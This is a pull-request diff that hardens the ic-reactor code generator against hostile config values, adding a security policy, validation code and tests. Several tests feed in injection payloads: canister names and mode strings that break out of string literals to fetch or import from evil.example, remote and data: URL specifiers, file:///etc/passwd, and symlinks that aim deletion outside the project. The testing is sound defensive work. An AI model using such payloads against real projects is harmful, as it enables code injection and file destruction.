### PR TITLE
fix(codegen): treat canister config as untrusted input

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -1,0 +1,64 @@
+# Security Policy
+
+## Reporting a vulnerability
+
+**Please do not open a public issue for a security vulnerability.**
+
+Report it privately through GitHub's private vulnerability reporting:
+
+1. Go to <https://github.com/B3Pay/ic-reactor/security/advisories/new>
+2. Describe the issue, the affected package and version, and how to reproduce it.
+
+If private reporting is unavailable, open a public issue containing only "security report — please provide a private contact" and no technical detail, and a maintainer will follow up with a private channel.
+
+We aim to acknowledge a report within 5 working days.
+
+## What to include
+
+The more of this you can provide, the faster a fix lands:
+
+- Which package and version (`@ic-reactor/core`, `@ic-reactor/react`, `@ic-reactor/candid`, `@ic-reactor/parser`, `@ic-reactor/codegen`, `@ic-reactor/cli`, `@ic-reactor/vite-plugin`)
+- A minimal reproduction — a config file, a `.did`, or a short script
+- What an attacker controls, and what they gain
+- Any known workaround
+
+## Supported versions
+
+| Package                                 | Supported |
+| --------------------------------------- | --------- |
+| `@ic-reactor/{core,react,candid}`       | `3.x`     |
+| `@ic-reactor/{codegen,cli,vite-plugin}` | `0.12.x`  |
+| `@ic-reactor/parser`                    | `0.4.x`   |
+
+Fixes land on the latest minor of each supported line. Older minors are not backported.
+
+## Threat model
+
+IC Reactor is a client-side library plus a build-time code generator. Two boundaries matter, and they have different trust assumptions.
+
+### Runtime (`core`, `react`, `candid`, `parser`)
+
+These run in the user's browser or on their server. In scope:
+
+- Anything that causes one principal's canister data to be served to another (cache-key scoping, identity-switch handling, SSR request isolation)
+- Anything that weakens certificate verification — in particular how the agent's root key is chosen
+- Anything that mishandles delegations or identity material
+- Candid decoding of hostile canister responses
+
+Out of scope: a canister returning wrong data is the canister's problem, not the library's, unless the library misrepresents it as verified.
+
+### Build time (`codegen`, `cli`, `vite-plugin`)
+
+**These treat `ic-reactor.json` and plugin options as untrusted input.** The pipeline turns config values into filesystem paths it recursively deletes, and into source text it writes into the consumer's bundle. A developer who clones a repository and runs `pnpm install && pnpm dev` should not thereby give that repository the ability to delete files outside the project or execute code of its choosing.
+
+In scope:
+
+- A config value that resolves to a path outside the project root
+- A config value that injects source text into generated output
+- A `.did` file whose contents or filename influence anything beyond the declarations it describes
+
+Out of scope: a developer explicitly and knowingly pointing `outDir` somewhere destructive within their own project.
+
+## Disclosure
+
+We will credit reporters who want it. If you plan to publish, please give us 90 days from acknowledgement, or until a fix ships — whichever comes first.

--- a/packages/cli/schema.json
+++ b/packages/cli/schema.json
@@ -32,7 +32,9 @@
         "properties": {
           "name": {
             "type": "string",
-            "description": "Canister name (required)"
+            "pattern": "^[A-Za-z0-9_.-]+$",
+            "maxLength": 64,
+            "description": "Canister name (required). May contain only letters, digits, '_', '.' and '-' — it becomes a directory name. It must also derive a valid TypeScript identifier, so a name beginning with a digit (e.g. '2048_game') is rejected at generation time."
           },
           "didFile": {
             "type": "string",

--- a/packages/cli/src/commands/init.ts
+++ b/packages/cli/src/commands/init.ts
@@ -17,7 +17,11 @@ import {
   ensureDir,
 } from "../utils/config.js"
 import type { CodegenConfig, CanisterConfig } from "../types.js"
-import { generateClientFile } from "@ic-reactor/codegen"
+import {
+  generateClientFile,
+  assertContainedPath,
+  CodegenConfigError,
+} from "@ic-reactor/codegen"
 
 interface InitOptions {
   yes?: boolean
@@ -98,7 +102,18 @@ export async function initCommand(options: InitOptions) {
   ensureDir(path.join(projectRoot, config.outDir))
 
   // Create default Client Manager
-  const clientManagerFile = resolveClientManagerFilePath(projectRoot, config)
+  let clientManagerFile: string
+  try {
+    clientManagerFile = resolveClientManagerFilePath(projectRoot, config)
+  } catch (err) {
+    if (err instanceof CodegenConfigError) {
+      p.log.error(err.message)
+      p.outro(pc.red("✗ Setup failed"))
+      process.exitCode = 1
+      return
+    }
+    throw err
+  }
 
   if (!fs.existsSync(clientManagerFile)) {
     const displayedPath = path.relative(projectRoot, clientManagerFile)
@@ -144,8 +159,21 @@ function resolveClientManagerFilePath(
   const clientManagerPath = config.clientManagerPath ?? "../../clients"
   const generatedEntryDir = path.join(projectRoot, config.outDir, canisterName)
   const resolvedPath = path.resolve(generatedEntryDir, clientManagerPath)
+  const filePath = path.extname(resolvedPath)
+    ? resolvedPath
+    : `${resolvedPath}.ts`
 
-  return path.extname(resolvedPath) ? resolvedPath : `${resolvedPath}.ts`
+  // `clientManagerPath` is an import specifier in generated code, but here it is
+  // also a WRITE target — init creates the file. A config-supplied value must
+  // not be able to place that file outside the project.
+  assertContainedPath(
+    "clientManagerPath",
+    filePath,
+    projectRoot,
+    clientManagerPath
+  )
+
+  return filePath
 }
 
 async function promptForCanister(

--- a/packages/codegen/src/generators/reactor.ts
+++ b/packages/codegen/src/generators/reactor.ts
@@ -60,6 +60,14 @@ function getReactorClassImportSource(
     case "CandidDisplayReactor":
     case "MetadataDisplayReactor":
       return "@ic-reactor/candid"
+    default:
+      // The pipeline validates `mode` against a closed set before we are
+      // reached. Failing closed here means a caller that skips validation gets
+      // an error rather than an unknown class name interpolated into source.
+      throw new Error(
+        `Unknown reactor class ${JSON.stringify(reactorClass)}. Expected one of: ` +
+          `Reactor, DisplayReactor, CandidReactor, CandidDisplayReactor, MetadataDisplayReactor.`
+      )
   }
 }
 
@@ -105,9 +113,12 @@ export const {
 `
       : ""
 
-  return `${runtimeTarget === "react" ? 'import { createActorHooks } from "@ic-reactor/react"\n' : ""}import { ${reactorClass} } from "${reactorImportSource}"
-import { clientManager } from "${clientManagerPath}"
-import { idlFactory, type _SERVICE } from "${declarationsPath}"
+  // Every interpolation into emitted source is JSON.stringify'd. The pipeline
+  // validates these values before we are called; quoting them here as well
+  // means a future caller that skips validation cannot inject source text.
+  return `${runtimeTarget === "react" ? 'import { createActorHooks } from "@ic-reactor/react"\n' : ""}import { ${reactorClass} } from ${JSON.stringify(reactorImportSource)}
+import { clientManager } from ${JSON.stringify(clientManagerPath)}
+import { idlFactory, type _SERVICE } from ${JSON.stringify(declarationsPath)}
 
 export type ${serviceName} = _SERVICE
 
@@ -123,7 +134,7 @@ export type ${serviceName} = _SERVICE
 export const ${reactorName} = new ${reactorClass}<${serviceName}>({
   clientManager,
   idlFactory,
-${canisterIdLine}  name: "${canisterName}",
+${canisterIdLine}  name: ${JSON.stringify(canisterName)},
 })${hookExports || "\n"}`
 }
 

--- a/packages/codegen/src/index.ts
+++ b/packages/codegen/src/index.ts
@@ -21,6 +21,25 @@ export type { PipelineOptions, PipelineResult } from "./pipeline.js"
 // Utilities
 export { toPascalCase, getReactorName, getServiceTypeName } from "./naming.js"
 
+// Config validation (run by the pipeline; exported for callers that want to
+// validate a config before invoking generation)
+export {
+  assertSafeCanisterConfig,
+  assertSafeCanisterName,
+  assertSafeModuleSpecifier,
+  assertContainedPath,
+  assertOneOf,
+  resolveContainedOutDir,
+  CodegenConfigError,
+  CANISTER_NAME_PATTERN,
+  REACTOR_CLASS_NAMES,
+  CODEGEN_TARGETS,
+} from "./validate.js"
+export type {
+  ValidatedCanisterPaths,
+  ValidateCanisterConfigOptions,
+} from "./validate.js"
+
 export { parseDIDFile, extractMethods } from "./parser.js"
 export type { MethodInfo, MethodType } from "./parser.js"
 

--- a/packages/codegen/src/pipeline.ts
+++ b/packages/codegen/src/pipeline.ts
@@ -25,6 +25,7 @@ import {
   generateReactorEntryFile,
   generateReactorFile,
 } from "./generators/reactor.js"
+import { assertSafeCanisterConfig, CodegenConfigError } from "./validate.js"
 
 export interface PipelineOptions {
   /** Canister name and config */
@@ -102,6 +103,37 @@ export async function runCanisterPipeline(
 
   const files: GeneratorResult[] = []
 
+  // ── Validate config ────────────────────────────────────────────────────────
+  //
+  // Runs before any filesystem work. `name`, `outDir` and `clientManagerPath`
+  // come from a checked-in config file, and downstream they become a directory
+  // this pipeline recursively deletes and source text it writes into the user's
+  // bundle — so they are validated here, at the choke point every entry path
+  // (CLI, vite plugin, direct API) goes through.
+  let validated: ReturnType<typeof assertSafeCanisterConfig>
+  try {
+    validated = assertSafeCanisterConfig({
+      name,
+      canisterOutDir: canisterConfig.outDir,
+      globalOutDir: globalConfig.outDir,
+      clientManagerPath:
+        clientManagerPath ?? globalConfig.clientManagerPath ?? "../../clients",
+      projectRoot,
+      mode: canisterConfig.mode,
+      target: canisterConfig.target ?? globalConfig.target,
+    })
+  } catch (err) {
+    if (err instanceof CodegenConfigError) {
+      return {
+        canisterName: typeof name === "string" ? name : String(name),
+        success: false,
+        files,
+        error: err.message,
+      }
+    }
+    throw err
+  }
+
   // ── Resolve paths ──────────────────────────────────────────────────────────
 
   const resolvedDidFile = path.isAbsolute(didFile)
@@ -117,17 +149,12 @@ export async function runCanisterPipeline(
     }
   }
 
-  // Per-canister outDir overrides global outDir
-  const canisterOutDir =
-    canisterConfig.outDir != null
-      ? path.isAbsolute(canisterConfig.outDir)
-        ? canisterConfig.outDir
-        : path.resolve(projectRoot, canisterConfig.outDir)
-      : path.resolve(projectRoot, globalConfig.outDir, name)
+  // Per-canister outDir overrides global outDir; both are resolved and
+  // containment-checked by assertSafeCanisterConfig above.
+  const canisterOutDir = validated.outDir
 
   // clientManagerPath falls back to global, then a safe default
-  const resolvedClientManagerPath =
-    clientManagerPath ?? globalConfig.clientManagerPath ?? "../../clients"
+  const resolvedClientManagerPath = validated.clientManagerPath
 
   // ── Step 1: Declarations ───────────────────────────────────────────────────
 

--- a/packages/codegen/src/validate.test.ts
+++ b/packages/codegen/src/validate.test.ts
@@ -209,6 +209,43 @@ describe("bypasses found by adversarial review", () => {
     ).toBe(true)
   })
 
+  it("refuses a symlinked canister directory under the global outDir", async () => {
+    // The global-outDir branch appends the canister name AFTER resolving the
+    // parent, so checking only the parent leaves the final segment free to be a
+    // symlink out of the project.
+    const victim = path.join(tmpRoot, "victim")
+    fs.mkdirSync(path.join(victim, "declarations"), { recursive: true })
+    fs.writeFileSync(
+      path.join(victim, "declarations", "IRREPLACEABLE.txt"),
+      "keep me"
+    )
+
+    const declarations = path.join(projectRoot, "src", "declarations")
+    fs.mkdirSync(declarations, { recursive: true })
+    fs.symlinkSync(victim, path.join(declarations, "backend"))
+
+    const result = await run(
+      { name: "backend" },
+      { outDir: "src/declarations" }
+    )
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/outside the project root/)
+    expect(
+      fs.existsSync(path.join(victim, "declarations", "IRREPLACEABLE.txt"))
+    ).toBe(true)
+  })
+
+  it("accepts a contained directory whose name merely begins with dots", async () => {
+    // "..generated" relativizes to "..generated", which a naive `..` prefix
+    // test rejects even though it is inside the project.
+    for (const outDir of ["..generated", "..secret/gen", "..a/b"]) {
+      const result = await run({ name: "backend" }, { outDir })
+      expect(result.error).toBeUndefined()
+      expect(result.success).toBe(true)
+    }
+  })
+
   it("refuses an unknown mode instead of interpolating it into an import", async () => {
     const result = await run({
       name: "backend",

--- a/packages/codegen/src/validate.test.ts
+++ b/packages/codegen/src/validate.test.ts
@@ -1,0 +1,356 @@
+import { describe, expect, it, beforeEach, afterEach } from "vitest"
+import fs from "node:fs"
+import os from "node:os"
+import path from "node:path"
+import { runCanisterPipeline } from "./pipeline.js"
+import {
+  assertSafeCanisterName,
+  assertSafeModuleSpecifier,
+  assertOneOf,
+  resolveContainedOutDir,
+  CodegenConfigError,
+  REACTOR_CLASS_NAMES,
+} from "./validate.js"
+
+const VALID_DID = "service : { greet : (text) -> (text) query; }\n"
+
+let tmpRoot: string
+let projectRoot: string
+
+beforeEach(() => {
+  tmpRoot = fs.mkdtempSync(path.join(os.tmpdir(), "ic-reactor-validate-"))
+  projectRoot = path.join(tmpRoot, "project")
+  fs.mkdirSync(projectRoot, { recursive: true })
+  fs.writeFileSync(path.join(projectRoot, "backend.did"), VALID_DID)
+})
+
+afterEach(() => {
+  fs.rmSync(tmpRoot, { recursive: true, force: true })
+})
+
+function run(
+  canisterConfig: Record<string, unknown>,
+  globalConfig: Record<string, unknown> = {}
+) {
+  return runCanisterPipeline({
+    // eslint-disable-next-line @typescript-eslint/no-explicit-any
+    canisterConfig: { didFile: "./backend.did", ...canisterConfig } as any,
+    projectRoot,
+    globalConfig: {
+      outDir: "./src/declarations",
+      clientManagerPath: "../../clients",
+      ...globalConfig,
+      // eslint-disable-next-line @typescript-eslint/no-explicit-any
+    } as any,
+  })
+}
+
+describe("path containment (outDir escaping the project root)", () => {
+  it("refuses a relative outDir that escapes the project root, and deletes nothing", async () => {
+    const outside = path.join(tmpRoot, "outside")
+    const victim = path.join(outside, "declarations")
+    fs.mkdirSync(victim, { recursive: true })
+    fs.writeFileSync(path.join(victim, "user-data.txt"), "IRREPLACEABLE")
+
+    const result = await run({ name: "backend", outDir: "../outside" })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/outside the project root/)
+    // The pre-existing directory must be untouched.
+    expect(fs.existsSync(path.join(victim, "user-data.txt"))).toBe(true)
+    expect(fs.readFileSync(path.join(victim, "user-data.txt"), "utf-8")).toBe(
+      "IRREPLACEABLE"
+    )
+  })
+
+  it("refuses an absolute outDir pointing outside the project root", async () => {
+    const outside = path.join(tmpRoot, "abs-outside")
+    fs.mkdirSync(path.join(outside, "declarations"), { recursive: true })
+    fs.writeFileSync(path.join(outside, "declarations", "keep.txt"), "keep")
+
+    const result = await run({ name: "backend", outDir: outside })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/outside the project root/)
+    expect(fs.existsSync(path.join(outside, "declarations", "keep.txt"))).toBe(
+      true
+    )
+  })
+
+  it("refuses a canister name that traverses out of the global outDir", async () => {
+    const result = await run({ name: "../../../escape" })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/Invalid canister name/)
+    // Nothing may be written outside the project root.
+    expect(fs.existsSync(path.join(tmpRoot, "escape"))).toBe(false)
+  })
+
+  it("still accepts a normal relative outDir inside the project", async () => {
+    const result = await run({ name: "backend" })
+
+    expect(result.error).toBeUndefined()
+    expect(result.success).toBe(true)
+    const generated = path.join(
+      projectRoot,
+      "src/declarations/backend/declarations"
+    )
+    expect(fs.readdirSync(generated).sort()).toEqual([
+      "backend.d.ts",
+      "backend.did",
+      "backend.js",
+    ])
+  })
+})
+
+describe("source injection via config values", () => {
+  it("refuses a canister name that would break out of the emitted string literal", async () => {
+    const result = await run({
+      name: 'backend", stolen: (globalThis.fetch("https://evil.example")), z: "',
+    })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/Invalid canister name/)
+  })
+
+  it("refuses a clientManagerPath that is a remote URL", async () => {
+    const result = await run(
+      { name: "backend" },
+      { clientManagerPath: "https://evil.example/payload.js" }
+    )
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/URLs are not allowed/)
+  })
+
+  it("refuses a per-canister clientManagerPath containing a quote", async () => {
+    const result = await run({
+      name: "backend",
+      clientManagerPath: '../clients"; import "https://evil.example/x.js',
+    })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/must not contain quotes/)
+  })
+
+  it("emits a JSON-quoted name for a legitimate canister name", async () => {
+    await run({ name: "my-canister" })
+
+    const generated = fs.readFileSync(
+      path.join(projectRoot, "src/declarations/my-canister/index.generated.ts"),
+      "utf-8"
+    )
+    expect(generated).toContain('name: "my-canister",')
+    expect(generated).toContain('import { clientManager } from "../../clients"')
+  })
+})
+
+describe("identifier validity (issue #299)", () => {
+  it("refuses a digit-leading name instead of emitting invalid TypeScript", async () => {
+    const result = await run({ name: "2048_game" })
+
+    expect(result.success).toBe(false)
+    // "2048_game" derives `2048GameReactor`, which is not a valid identifier.
+    expect(result.error).toMatch(/not a valid TypeScript identifier/)
+    expect(result.error).toContain("2048GameReactor")
+  })
+
+  it("refuses a punctuation-only name that would collapse to an empty stem", async () => {
+    for (const name of ["_", "--", "..."]) {
+      const result = await run({ name })
+      expect(result.success).toBe(false)
+      expect(result.error).toMatch(/collapses to an empty identifier/)
+    }
+  })
+
+  it("refuses a bare-digit name that derives a digit-leading identifier", async () => {
+    const result = await run({ name: "2048" })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/not a valid TypeScript identifier/)
+  })
+
+  it("still accepts dfx-legal names that derive valid identifiers", async () => {
+    // dfx places no pattern restriction on canister names, and all of these
+    // produced working output before validation existed.
+    for (const name of ["_private", "my.canister", "hello-world", "a1"]) {
+      const result = await run({ name })
+      expect(result.error).toBeUndefined()
+      expect(result.success).toBe(true)
+    }
+  })
+
+  it("names the offending canister in the error", async () => {
+    const result = await run({ name: "2048_game" })
+
+    expect(result.error).toContain("2048_game")
+  })
+})
+
+describe("bypasses found by adversarial review", () => {
+  it("refuses a symlink inside the project root that points outside it", async () => {
+    const victim = path.join(tmpRoot, "victim")
+    fs.mkdirSync(path.join(victim, "declarations"), { recursive: true })
+    fs.writeFileSync(
+      path.join(victim, "declarations", "IRREPLACEABLE.txt"),
+      "keep me"
+    )
+
+    // A symlink that lives inside the project but resolves outside it.
+    // path.resolve does not follow symlinks, so a lexical check passes here.
+    fs.symlinkSync(victim, path.join(projectRoot, "escape-hatch"))
+
+    const result = await run({ name: "backend", outDir: "./escape-hatch" })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/outside the project root/)
+    expect(
+      fs.existsSync(path.join(victim, "declarations", "IRREPLACEABLE.txt"))
+    ).toBe(true)
+  })
+
+  it("refuses an unknown mode instead of interpolating it into an import", async () => {
+    const result = await run({
+      name: "backend",
+      mode: 'DisplayReactor"\nimport "https://evil.example/pwn.js"\n//',
+    })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/Invalid mode/)
+  })
+
+  it("refuses an unknown target", async () => {
+    const result = await run({ name: "backend", target: "nodejs" })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/Invalid target/)
+  })
+
+  it("still accepts every documented mode and target", async () => {
+    for (const mode of REACTOR_CLASS_NAMES) {
+      const result = await run({ name: "backend", mode })
+      expect(result.error).toBeUndefined()
+      expect(result.success).toBe(true)
+    }
+    for (const target of ["react", "core"]) {
+      const result = await run({ name: "backend", target })
+      expect(result.error).toBeUndefined()
+      expect(result.success).toBe(true)
+    }
+  })
+
+  it("refuses a URL specifier hidden behind leading whitespace", async () => {
+    // URL parsing strips surrounding whitespace, so an anchored scheme check
+    // alone would let this through and it would still load remotely.
+    for (const spec of [
+      " https://evil.example/x.js",
+      "  data:text/javascript,alert(1)",
+      "https://evil.example/x.js ",
+    ]) {
+      const result = await run({ name: "backend" }, { clientManagerPath: spec })
+      expect(result.success).toBe(false)
+      expect(result.error).toMatch(/whitespace|URLs are not allowed/)
+    }
+  })
+
+  it("returns a config error, not an uncaught TypeError, for a non-string outDir", async () => {
+    for (const outDir of [123, {}, [], true]) {
+      const result = await run({ name: "backend", outDir })
+      expect(result.success).toBe(false)
+      expect(result.error).toMatch(/expected a non-empty string/)
+    }
+  })
+
+  it("returns a config error for a non-string global outDir", async () => {
+    const result = await run({ name: "backend" }, { outDir: null })
+
+    expect(result.success).toBe(false)
+    expect(result.error).toMatch(/expected a non-empty string/)
+  })
+})
+
+describe("unit-level assertions", () => {
+  it("accepts every member of a closed set and rejects the rest", () => {
+    expect(() =>
+      assertOneOf("mode", "DisplayReactor", REACTOR_CLASS_NAMES)
+    ).not.toThrow()
+    for (const bad of ["displayreactor", "", undefined, null, 1, "Reactor "]) {
+      expect(() => assertOneOf("mode", bad, REACTOR_CLASS_NAMES)).toThrow(
+        CodegenConfigError
+      )
+    }
+  })
+
+  it("accepts conventional canister names", () => {
+    for (const name of [
+      "backend",
+      "my_canister",
+      "my-canister",
+      "a",
+      "Ledger",
+      "_private",
+      "my.canister",
+    ]) {
+      expect(() => assertSafeCanisterName(name)).not.toThrow()
+    }
+  })
+
+  it("rejects names that are path segments rather than canisters", () => {
+    for (const name of [".", ".."]) {
+      expect(() => assertSafeCanisterName(name)).toThrow(CodegenConfigError)
+    }
+  })
+
+  it("rejects non-string and empty names", () => {
+    for (const name of [undefined, null, 42, "", {}]) {
+      expect(() => assertSafeCanisterName(name)).toThrow(CodegenConfigError)
+    }
+  })
+
+  it("rejects names containing path separators", () => {
+    for (const name of ["a/b", "a\\b", "..", "../x", "a b"]) {
+      expect(() => assertSafeCanisterName(name)).toThrow(CodegenConfigError)
+    }
+  })
+
+  it("accepts relative and bare module specifiers", () => {
+    for (const spec of ["./clients", "../../clients", "@scope/pkg", "pkg"]) {
+      expect(() => assertSafeModuleSpecifier("p", spec)).not.toThrow()
+    }
+  })
+
+  it("rejects URL-ish and protocol-relative specifiers", () => {
+    for (const spec of [
+      "https://evil.example/x.js",
+      "http://evil.example/x.js",
+      "data:text/javascript,alert(1)",
+      "file:///etc/passwd",
+      "//evil.example/x.js",
+    ]) {
+      expect(() => assertSafeModuleSpecifier("p", spec)).toThrow(
+        CodegenConfigError
+      )
+    }
+  })
+
+  it("resolves a contained outDir to an absolute path", () => {
+    const root = path.join(tmpRoot, "root")
+    expect(resolveContainedOutDir("outDir", "./src/gen", root)).toBe(
+      path.join(root, "src/gen")
+    )
+  })
+
+  it("rejects an outDir that escapes via a symlink-free ..", () => {
+    const root = path.join(tmpRoot, "root")
+    expect(() => resolveContainedOutDir("outDir", "../sneaky", root)).toThrow(
+      CodegenConfigError
+    )
+  })
+
+  it("does not treat a sibling directory with a shared prefix as contained", () => {
+    const root = path.join(tmpRoot, "root")
+    expect(() =>
+      resolveContainedOutDir("outDir", "../root-evil", root)
+    ).toThrow(CodegenConfigError)
+  })
+})

--- a/packages/codegen/src/validate.ts
+++ b/packages/codegen/src/validate.ts
@@ -245,7 +245,11 @@ export function assertContainedPath(
     realpathAllowingMissing(resolved)
   )
 
-  if (relative.startsWith("..") || path.isAbsolute(relative)) {
+  // Test for a real ".." *segment*, not a ".." prefix: a directory legitimately
+  // named "..generated" relativizes to "..generated", which is inside the root.
+  const [firstSegment] = relative.split(/[\\/]/)
+
+  if (firstSegment === ".." || path.isAbsolute(relative)) {
     throw new CodegenConfigError(
       `Invalid ${label} ${JSON.stringify(original)}: resolves to ${JSON.stringify(resolved)}, ` +
         `which is outside the project root ${JSON.stringify(path.resolve(projectRoot))}. ` +
@@ -349,6 +353,17 @@ export function assertSafeCanisterConfig(
           resolveContainedOutDir("outDir", globalOutDir, projectRoot),
           name
         )
+
+  // Re-assert on the FINAL path. In the global-outDir branch the canister name
+  // is appended after that directory was checked, and the canister directory can
+  // itself be a symlink pointing out of the project — checking only the parent
+  // leaves the whole traversal open. Whatever this function returns has been
+  // containment-checked as a complete path.
+  assertContainedPath(
+    `output directory for canister ${JSON.stringify(name)}`,
+    outDir,
+    projectRoot
+  )
 
   return { name, outDir, clientManagerPath }
 }

--- a/packages/codegen/src/validate.ts
+++ b/packages/codegen/src/validate.ts
@@ -1,0 +1,354 @@
+/**
+ * Config validation for the codegen pipeline.
+ *
+ * Every value validated here arrives from a project's `ic-reactor.json` or from
+ * `@ic-reactor/vite-plugin` options — that is, from a file in a repository the
+ * user may have merely cloned. The pipeline turns those values into filesystem
+ * paths it recursively deletes and into source text it writes into the user's
+ * bundle, so they are treated as untrusted input rather than as configuration.
+ *
+ * Validation lives here, at the pipeline's own entry point, rather than in the
+ * CLI's interactive prompt: the prompt only covers one of the three entry paths
+ * (hand-edited config and plugin options bypass it entirely).
+ */
+
+import fs from "node:fs"
+import path from "node:path"
+import type { CodegenTarget, ReactorClassName } from "./types.js"
+import {
+  getHookPrefix,
+  getReactorName,
+  getServiceTypeName,
+  toPascalCase,
+} from "./naming.js"
+
+/**
+ * Thrown when a canister config would produce an unsafe path or unsafe
+ * generated source. Callers convert this into a `PipelineResult` error.
+ */
+export class CodegenConfigError extends Error {
+  override readonly name = "CodegenConfigError"
+
+  constructor(message: string) {
+    super(message)
+  }
+}
+
+/**
+ * Characters allowed in a canister name.
+ *
+ * A canister name becomes a directory segment, so this excludes path
+ * separators, quotes, whitespace and control characters. It deliberately does
+ * NOT require a leading letter: `dfx` places no restriction on canister names,
+ * and real projects use `_private` and `my.canister`, both of which derive
+ * perfectly good identifiers. Identifier validity is enforced separately, on
+ * the *derived* names, by {@link assertSafeCanisterName}.
+ */
+export const CANISTER_NAME_PATTERN = /^[A-Za-z0-9_.-]+$/
+
+/** A valid JavaScript/TypeScript identifier. */
+const IDENTIFIER_PATTERN = /^[A-Za-z_$][A-Za-z0-9_$]*$/
+
+const MAX_CANISTER_NAME_LENGTH = 64
+
+/** Matches a URI scheme (`https:`, `data:`, `file:`) or a protocol-relative prefix. */
+const HAS_URI_SCHEME = /^(?:[A-Za-z][A-Za-z0-9+.-]*:|\/\/)/
+
+/** Characters that would terminate the string literal or import specifier we emit into. */
+// eslint-disable-next-line no-control-regex
+const BREAKS_OUT_OF_LITERAL = /["'`\\\u0000-\u001f\u2028\u2029]/
+
+/**
+ * Assert that a canister name is safe to use as a path segment and as the stem
+ * of a generated identifier.
+ *
+ * Rejecting a leading digit here is what stops `2048_game` from reaching the
+ * generator, where it would become `export const 2048GameReactor` — invalid
+ * TypeScript emitted with a success status.
+ */
+export function assertSafeCanisterName(name: unknown): asserts name is string {
+  if (typeof name !== "string" || name.length === 0) {
+    throw new CodegenConfigError(
+      `Invalid canister name: expected a non-empty string, received ${
+        name === undefined ? "undefined" : JSON.stringify(name)
+      }. Check the "canisters" entries in your ic-reactor.json (or the plugin's "canisters" option).`
+    )
+  }
+
+  if (name.length > MAX_CANISTER_NAME_LENGTH) {
+    throw new CodegenConfigError(
+      `Invalid canister name ${JSON.stringify(name)}: must be at most ${MAX_CANISTER_NAME_LENGTH} characters.`
+    )
+  }
+
+  if (!CANISTER_NAME_PATTERN.test(name)) {
+    throw new CodegenConfigError(
+      `Invalid canister name ${JSON.stringify(name)}: may contain only letters, digits, ` +
+        `"_", "." and "-" (${CANISTER_NAME_PATTERN.source}). Canister names become directory ` +
+        `names, so path separators, quotes and whitespace are not allowed.`
+    )
+  }
+
+  // "." and ".." pass the character rule but are path traversal as segments.
+  if (name === "." || name === "..") {
+    throw new CodegenConfigError(
+      `Invalid canister name ${JSON.stringify(name)}: refers to a directory, not a canister.`
+    )
+  }
+
+  // The name is also the stem of every generated identifier. Check the derived
+  // names rather than the raw one, so dfx-legal names like "_private" and
+  // "my.canister" keep working while "2048_game" — which would emit
+  // `export const 2048GameReactor` — is caught here instead of by the compiler.
+  if (toPascalCase(name).length === 0) {
+    throw new CodegenConfigError(
+      `Invalid canister name ${JSON.stringify(name)}: contains no letters or digits, so it ` +
+        `collapses to an empty identifier in generated code.`
+    )
+  }
+
+  const derived: Array<[string, string]> = [
+    ["reactor constant", getReactorName(name)],
+    ["service type", getServiceTypeName(name)],
+    ["hook name", `use${getHookPrefix(name)}Query`],
+  ]
+
+  for (const [what, identifier] of derived) {
+    if (!IDENTIFIER_PATTERN.test(identifier)) {
+      throw new CodegenConfigError(
+        `Invalid canister name ${JSON.stringify(name)}: it derives the ${what} ` +
+          `${JSON.stringify(identifier)}, which is not a valid TypeScript identifier. ` +
+          `Rename the canister so it does not begin with a digit.`
+      )
+    }
+  }
+}
+
+/**
+ * Assert that a module specifier we interpolate into an `import` statement is a
+ * relative path or a bare package name — never a URL.
+ *
+ * A `https://…` specifier here would make the generated module pull code from a
+ * remote host at import time, inside the user's own bundle.
+ */
+export function assertSafeModuleSpecifier(
+  label: string,
+  specifier: unknown
+): asserts specifier is string {
+  if (typeof specifier !== "string" || specifier.length === 0) {
+    throw new CodegenConfigError(
+      `Invalid ${label}: expected a non-empty string, received ${
+        specifier === undefined ? "undefined" : JSON.stringify(specifier)
+      }.`
+    )
+  }
+
+  if (BREAKS_OUT_OF_LITERAL.test(specifier)) {
+    throw new CodegenConfigError(
+      `Invalid ${label} ${JSON.stringify(specifier)}: must not contain quotes, backslashes or control characters.`
+    )
+  }
+
+  // Surrounding whitespace is stripped when a specifier is parsed as a URL, so
+  // " https://evil.example/x.js" would slip past an anchored scheme check and
+  // then load as a remote URL anyway. Reject it outright and match the scheme
+  // against the trimmed value.
+  if (/^\s|\s$/.test(specifier)) {
+    throw new CodegenConfigError(
+      `Invalid ${label} ${JSON.stringify(specifier)}: must not begin or end with whitespace.`
+    )
+  }
+
+  if (HAS_URI_SCHEME.test(specifier.trim())) {
+    throw new CodegenConfigError(
+      `Invalid ${label} ${JSON.stringify(specifier)}: must be a relative path ("./…", "../…") or a ` +
+        `bare package name. URLs are not allowed — the generated file imports from this specifier.`
+    )
+  }
+}
+
+/** Reactor classes the generator knows how to emit an import for. */
+export const REACTOR_CLASS_NAMES: readonly ReactorClassName[] = [
+  "Reactor",
+  "DisplayReactor",
+  "CandidReactor",
+  "CandidDisplayReactor",
+  "MetadataDisplayReactor",
+]
+
+/** Runtime targets the generator knows how to emit. */
+export const CODEGEN_TARGETS: readonly CodegenTarget[] = ["react", "core"]
+
+/**
+ * Assert a config value is one of a closed set.
+ *
+ * `mode` and `target` are interpolated into emitted source as bare identifiers
+ * and module specifiers, so an unrecognized value is not merely unsupported —
+ * it is injected.
+ */
+export function assertOneOf<T extends string>(
+  label: string,
+  value: unknown,
+  allowed: readonly T[]
+): asserts value is T {
+  if (typeof value !== "string" || !allowed.includes(value as T)) {
+    throw new CodegenConfigError(
+      `Invalid ${label} ${JSON.stringify(value)}: must be one of ${allowed
+        .map((a) => JSON.stringify(a))
+        .join(", ")}.`
+    )
+  }
+}
+
+/**
+ * Resolve a path to its real location on disk, following symlinks.
+ *
+ * The target usually does not exist yet (it is about to be generated), so this
+ * resolves the deepest ancestor that *does* exist and re-appends the remainder.
+ * Without this, containment is purely lexical and a symlink placed inside the
+ * project root — which `path.resolve` does not follow — escapes it.
+ */
+function realpathAllowingMissing(target: string): string {
+  let current = path.resolve(target)
+  const missing: string[] = []
+
+  for (;;) {
+    try {
+      return path.join(fs.realpathSync(current), ...missing)
+    } catch {
